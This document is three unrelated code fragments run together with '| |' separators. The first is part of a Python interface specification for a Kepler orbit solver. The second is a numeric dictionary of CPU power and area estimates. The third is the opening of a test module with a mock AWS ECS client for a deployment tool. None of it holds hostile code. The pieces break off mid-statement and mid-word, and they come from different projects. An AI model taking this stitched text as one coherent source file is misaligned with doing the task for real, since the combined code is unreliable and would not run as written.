function.addParameter('y', dtype='float64', direction=function.IN,
unit = nbody_system.length)
function.addParameter('z', dtype='float64', direction=function.IN,
unit = nbody_system.length)
function.addParameter('vx', dtype='float64', direction=function.IN,
unit = nbody_system.speed)
function.addParameter('vy', dtype='float64', direction=function.IN,
unit = nbody_system.speed)
function.addParameter('vz', dtype='float64', direction=function.IN,
unit = nbody_system.speed)
function.addParameter('time', dtype='float64', direction=function.IN,
default = 0, unit = nbody_system.time)
function.result_type = 'int32'
function.result_doc = """
0 - OK
new kepler was created
-1 - ERROR
kepler could not be created"""
return function
@legacy_function
def initialize_from_elements():
"""
Initialize a new kepler system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('mass', dtype='float64', direction=function.IN,
unit = nbody_system.mass)
function.addParameter('semi', dtype='float64', direction=function.IN,
unit = nbody_system.length)
function.addParameter('ecc', dtype='float64', direction=function.IN,
unit = NO_UNIT)
function.addParameter('mean_anomaly',
dtype='float64', direction=function.IN,
default = 0, unit = NO_UNIT)
function.addParameter('time', dtype='float64', direction=function.IN,
default = 0, unit = nbody_system.time)
function.addParameter('periastron',
dtype='float64', direction=function.IN,
default = 0, unit = nbody_system.length)
function.addParameter('random_orientation',
dtype='int32', direction=function.IN,
default = 0, unit = NO_UNIT)
function.result_type = 'int32'
function.result_doc = """
0 - OK
new kepler was created
-1 - ERROR
kepler could not be created"""
return function
@legacy_function
def transform_to_time():
"""
Transform the kepler system to the specified time.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('time', dtype='float64', direction=function.IN,
unit = nbody_system.time)
function.result_type = 'int32'
function.result_doc = """
0 - OK
transform to time OK
-1 - ERROR
could not transform to time"""
return function
@legacy_function
def advance_to_radius():
"""
Evolve the kepler system forward in time to the specified radius.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('radius', dtype='float64', direction=function.IN,
unit = nbody_system.length)
function.result_type = 'int32'
function.result_doc = """
0 - OK
advance to radius OK
-1 - ERROR
could not advance to radius"""
return function
@legacy_function
def return_to_radius():
"""
Evolve the kepler system backward in time to the specified radius.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('radius', dtype='float64', direction=function.IN,
unit = nbody_system.length)
function.result_type = 'int32'
function.result_doc = """
0 - OK
return to radius OK
-1 - ERROR
could not return to radius"""
return function
@legacy_function
def advance_to_periastron():
"""
Evolve the kepler system forward in time to the next periastron.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.result_type = 'int32'
function.result_doc = """
0 - OK
advance to periastron OK
-1 - ERROR
could not advance to periastron"""
return function
@legacy_function
def advance_to_apastron():
"""
Evolve the kepler system forward in time to the next apastron.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.result_type = 'int32'
function.result_doc = """
0 - OK
advance to apastron OK
-1 - ERROR
could not advance to apastron"""
return function
@legacy_function
def return_to_periastron():
"""
Evolve the kepler system backward in time to the previous periastron.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.result_type = 'int32'
function.result_doc = """
0 - OK
return to periastron OK
-1 - ERROR
could not return to periastron"""
return function
@legacy_function
def return_to_apastron():
"""
Evolve the kepler system backward in time to the previous apastron.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.result_type = 'int32'
function.result_doc = """
0 - OK
return to apastron OK
-1 - ERROR
could not return to apastron"""
return function
@legacy_function
def get_total_mass():
"""
Return the total mass (remind the user) of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('mass', dtype='float64', direction=function.OUT,
unit = nbody_system.mass)
function.result_type = 'int32'
function.result_doc = """
0 - OK
get mass OK
-1 - ERROR
could not get mass"""
return function
@legacy_function
def get_time():
"""
Return the current time of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('time', dtype='float64', direction=function.OUT,
unit = nbody_system.time)
function.result_type = 'int32'
function.result_doc = """
0 - OK
get time OK
-1 - ERROR
could not get time"""
return function
@legacy_function
def get_period():
"""
Return the periodof the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('period', dtype='float64', direction=function.OUT,
unit = nbody_system.time)
function.result_type = 'int32'
function.result_doc = """
0 - OK
get period OK
-1 - ERROR
could not get period"""
return function
@legacy_function
def get_elements():
"""
Return the orbital elements (a,e) of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('semi', dtype='float64', direction=function.OUT,
unit = nbody_system.length)
function.addParameter('ecc', dtype='float64', direction=function.OUT,
unit = NO_UNIT)
function.result_type = 'int32'
function.result_doc = """
0 - OK
get elements OK
-1 - ERROR
could not get elements"""
return function
@legacy_function
def get_integrals():
"""
Return the total energy and angular momentum of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('energy', dtype='float64', direction=function.OUT,
unit = nbody_system.speed*nbody_system.speed)
function.addParameter('angular_momentum',
dtype='float64', direction=function.OUT,
unit = nbody_system.length*nbody_system.speed)
function.result_type = 'int32'
function.result_doc = """
0 - OK
get integrals OK
-1 - ERROR
could not get integrals"""
return function
@legacy_function
def get_separation_vector():
"""
Return the current separation vector (x,y,z) of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('x', dtype='float64', direction=function.OUT,
unit = nbody_system.length)
function.addParameter('y', dtype='float64', direction=function.OUT,
unit = nbody_system.length)
function.addParameter('z', dtype='float64', direction=function.OUT,
unit = nbody_system.length)
function.result_type = 'int32'
function.result_doc = """
0 - OK
get separation vector OK
-1 - ERROR
could not get separation vector"""
return function
@legacy_function
def get_separation():
"""
Return the current separation r of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('r', dtype='float64', direction=function.OUT,
unit = nbody_system.length)
function.result_type = 'int32'
function.result_doc = """
0 - OK
get separation OK
-1 - ERROR
could not get separation"""
return function
@legacy_function
def set_periastron():
"""
Set the current periastron of the system (initialization only).
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('peri', dtype='float64', direction=function.IN,
unit = nbody_system.length)
function.result_type = 'int32'
function.result_doc = """
0 - OK
set periastron OK
-1 - ERROR
could not set periastron"""
return function
@legacy_function
def get_periastron():
"""
Return the current periastron of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('peri', dtype='float64', direction=function.OUT,
unit = nbody_system.length)
function.result_type = 'int32'
function.result_doc = """
0 - OK
get periastron OK
-1 - ERROR
could not get periastron"""
return function
@legacy_function
def get_apastron():
"""
Return the current apastron of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('apo', dtype='float64', direction=function.OUT,
unit = nbody_system.length)
function.result_type = 'int32'
function.result_doc = """
0 - OK
get apastron OK
-1 - ERROR
could not get apastron"""
return function
@legacy_function
def get_velocity_vector():
"""
Return the current relative velocity vector (x,y,z) of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('vx', dtype='float64', direction=function.OUT,
unit = nbody_system.speed)
function.addParameter('vy', dtype='float64', direction=function.OUT,
unit = nbody_system.speed)
function.addParameter('vz', dtype='float64', direction=function.OUT,
unit = nbody_system.speed)
function.result_type = 'int32'
function.result_doc = """
0 - OK
get velocity vector OK
-1 - ERROR
could not get velocity vector"""
return function
@legacy_function
def get_angles():
"""
Return the current mean and true anomalies of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('true_anomaly',
dtype='float64', direction=function.OUT)
function.addParameter('mean_anomaly',
dtype='float64', direction=function.OUT)
function.result_type = 'int32'
function.result_doc = """
0 - OK
get angles OK
-1 - ERROR
could not get angles"""
return function
@legacy_function
def set_longitudinal_unit_vector():
"""
Set the longitudinal unit vector of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('vx', dtype='float64', direction=function.IN)
function.addParameter('vy', dtype='float64', direction=function.IN)
function.addParameter('vz', dtype='float64', direction=function.IN)
function.result_type = 'int32'
function.result_doc = """
0 - OK
set vector OK
-1 - ERROR
could not set vector"""
return function
@legacy_function
def set_normal_unit_vector():
"""
Set the normal unit vector of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('vx', dtype='float64', direction=function.IN)
function.addParameter('vy', dtype='float64', direction=function.IN)
function.addParameter('vz', dtype='float64', direction=function.IN)
function.result_type = 'int32'
function.result_doc = """
0 - OK
set vector OK
-1 - ERROR
could not set | |
0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.173353,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.23654,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.02398,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.221524,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.163822,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.166994,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.269355,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.135961,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.572309,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.165877,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.41642,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0309496,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00700447,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0582336,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0518023,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0891831,
'Execution Unit/Register Files/Runtime Dynamic': 0.0588068,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.128678,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.330941,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.58896,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00166267,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00166267,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00150066,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000609628,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000744144,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00557015,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0140668,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0497989,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.16764,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.162142,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.169139,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.53989,
'Instruction Fetch Unit/Runtime Dynamic': 0.400717,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0266781,
'L2/Runtime Dynamic': 0.00533784,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.71937,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.714833,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0479543,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0479543,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.94582,
'Load Store Unit/Runtime Dynamic': 0.999282,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.118247,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.236494,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0419663,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0423532,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.196952,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0266213,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.425152,
'Memory Management Unit/Runtime Dynamic': 0.0689745,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 16.9434,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0814145,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00852509,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0834124,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
| |
<reponame>burningmantech/ranger-deploy
##
# See the file COPYRIGHT for copyright information.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
"""
Tests for :mod:`deploy.aws.ecs`
"""
from contextlib import contextmanager
from copy import deepcopy
from os import chdir, environ, getcwd
from os.path import dirname
from typing import (
Any,
Callable,
ClassVar,
Dict,
Iterator,
List,
Mapping,
Optional,
Sequence,
Set,
Tuple,
Type,
cast,
)
from attr import Attribute, attrib, attrs
from hypothesis import assume, given
from hypothesis.strategies import (
booleans,
characters,
composite,
dictionaries,
integers,
just,
lists,
one_of,
sampled_from,
sets,
text,
tuples,
)
from twisted.trial.unittest import SynchronousTestCase as TestCase
import deploy.notify.smtp
from deploy.ext.click import clickTestRun
from deploy.ext.hypothesis import (
ascii_text,
commitIDs,
email_addresses,
image_names,
image_repository_names,
port_numbers,
repository_ids,
user_names,
)
from deploy.notify.smtp import SMTPNotifier
from .test_ecr import ECRServiceClient, testingECRServiceClient
from .. import ecs
from ..ecs import (
ECSServiceClient,
NoChangesError,
NoSuchServiceError,
TaskDefinition,
TaskEnvironment,
TaskEnvironmentUpdates,
)
__all__ = ()
def environment_updates(
min_size: int = 0, max_size: Optional[int] = None
) -> Mapping[str, str]:
return cast(
Mapping[str, str],
dictionaries(
text(min_size=1),
text(),
min_size=min_size,
max_size=max_size,
),
)
@composite
def set_unset_envs(draw: Callable) -> Tuple[Dict[str, str], Set[str]]:
updates = draw(environment_updates(min_size=1))
removes = draw(sets(elements=just(tuple(updates.keys()))))
return (updates, removes)
@attrs(auto_attribs=True)
class MockBoto3ECSClient:
"""
Mock Boto3 client.
"""
#
# Class attributes
#
_sampleClusterStaging: ClassVar = "staging-cluster"
_sampleServiceStaging: ClassVar = "staging-service-fg"
_sampleClusterProduction: ClassVar = "production-cluster"
_sampleServiceProduction: ClassVar = "production-service-fg"
_defaultARNNamespace: ClassVar = "arn:mock:task-definition/service"
_defaultCompatibilities: ClassVar[Sequence[str]] = ["EC2", "FARGATE"]
_defaultRequiresAttributes: ClassVar[Sequence[Mapping[str, str]]] = [
{"name": "ecs.capability.execution-role-ecr-pull"},
{"name": "com.amazonaws.ecs.capability.ecr-auth"},
{"name": "com.amazonaws.ecs.capability.task-iam-role"},
]
_defaultTaskDefinitions: ClassVar[Sequence[TaskDefinition]] = [
{
"taskDefinitionArn": f"{_defaultARNNamespace}:0",
"family": "service-fg",
"revision": 1,
"registeredAt": 1234,
"registeredBy": "?",
"containerDefinitions": [
{
"name": "service-container",
"image": "/team/service-project:1000",
"cpu": 0,
"memory": 128,
"portMappings": [
{
"containerPort": 80,
"hostPort": 80,
"protocol": "tcp",
},
],
"essential": True,
"environment": ECSServiceClient._environmentAsJSON(
{
"version": "0",
"happiness": "true",
}
),
"mountPoints": [],
"volumesFrom": [],
},
],
"taskRoleArn": "arn:mock:role/ecsTaskExecutionRole",
"executionRoleArn": "arn:mock:role/ecsTaskExecutionRole",
"networkMode": "awsvpc",
"volumes": [],
"status": "ACTIVE",
"requiresAttributes": deepcopy(_defaultRequiresAttributes),
"placementConstraints": [],
"compatibilities": list(_defaultCompatibilities),
"requiresCompatibilities": ["FARGATE"],
"cpu": "256",
"memory": "512",
},
{
"taskDefinitionArn": f"{_defaultARNNamespace}:1",
"family": "service-fg",
"revision": 1,
"registeredAt": 1234,
"registeredBy": "?",
"containerDefinitions": [
{
"name": "service-container",
"image": "/team/service-project:1001",
"cpu": 0,
"memory": 128,
"portMappings": [
{
"containerPort": 80,
"hostPort": 80,
"protocol": "tcp",
},
],
"essential": True,
"environment": ECSServiceClient._environmentAsJSON(
{
"version": "0",
"happiness": "true",
"VARIABLE1": "value1",
"VARIABLE2": "value2",
}
),
"mountPoints": [],
"volumesFrom": [],
},
],
"taskRoleArn": "arn:mock:role/ecsTaskExecutionRole",
"executionRoleArn": "arn:mock:role/ecsTaskExecutionRole",
"networkMode": "awsvpc",
"volumes": [],
"status": "ACTIVE",
"requiresAttributes": deepcopy(_defaultRequiresAttributes),
"placementConstraints": [],
"compatibilities": list(_defaultCompatibilities),
"requiresCompatibilities": ["FARGATE"],
"cpu": "256",
"memory": "512",
},
]
_taskDefinitions: ClassVar[Dict[str, TaskDefinition]] = {}
_services: ClassVar[Dict[str, Dict[str, str]]] = {}
@classmethod
def _addDefaultTaskDefinitions(cls) -> None:
for taskDefinition in cls._defaultTaskDefinitions:
cls._taskDefinitions[
taskDefinition["taskDefinitionArn"]
] = deepcopy(taskDefinition)
@classmethod
def _defaultTaskARNs(cls) -> Sequence[str]:
return [
taskDefinition["taskDefinitionArn"]
for taskDefinition in cls._defaultTaskDefinitions
]
@classmethod
def _clearTaskDefinitions(cls) -> None:
cls._taskDefinitions.clear()
@classmethod
def _addCluster(cls, cluster: str) -> None:
if cluster in cls._services: # pragma: no cover
raise AssertionError(f"Cluster {cluster!r} already exists")
cls._services[cluster] = {}
@classmethod
def _addService(cls, cluster: str, service: str, arn: str) -> None:
if service in cls._services[cluster]: # pragma: no cover
raise AssertionError(
f"Service {service!r} already exists in cluster {cluster!r}"
)
cls._services[cluster][service] = arn
@classmethod
def _addDefaultServices(cls) -> None:
cls._addCluster(cls._sampleClusterStaging)
cls._addService(
cls._sampleClusterStaging,
cls._sampleServiceStaging,
cls._defaultTaskARNs()[-1],
)
cls._addCluster(cls._sampleClusterProduction)
cls._addService(
cls._sampleClusterProduction,
cls._sampleServiceProduction,
cls._defaultTaskARNs()[-1],
)
@classmethod
def _clearServices(cls) -> None:
cls._services.clear()
@classmethod
def _currentTaskARN(cls, cluster: str, service: str) -> str:
if cluster not in cls._services: # pragma: no cover
raise AssertionError(
f"Cluster {cluster!r} not in {cls._services.keys()}"
)
if service not in cls._services[cluster]: # pragma: no cover
raise AssertionError(
f"Service {service!r} not in {cls._services[cluster].keys()}"
)
return cls._services[cluster][service]
@classmethod
def _setCurrentTaskARN(cls, cluster: str, service: str, arn: str) -> None:
cls._services[cluster][service] = arn
@classmethod
def _currentTaskDefinition(
cls, cluster: str, service: str
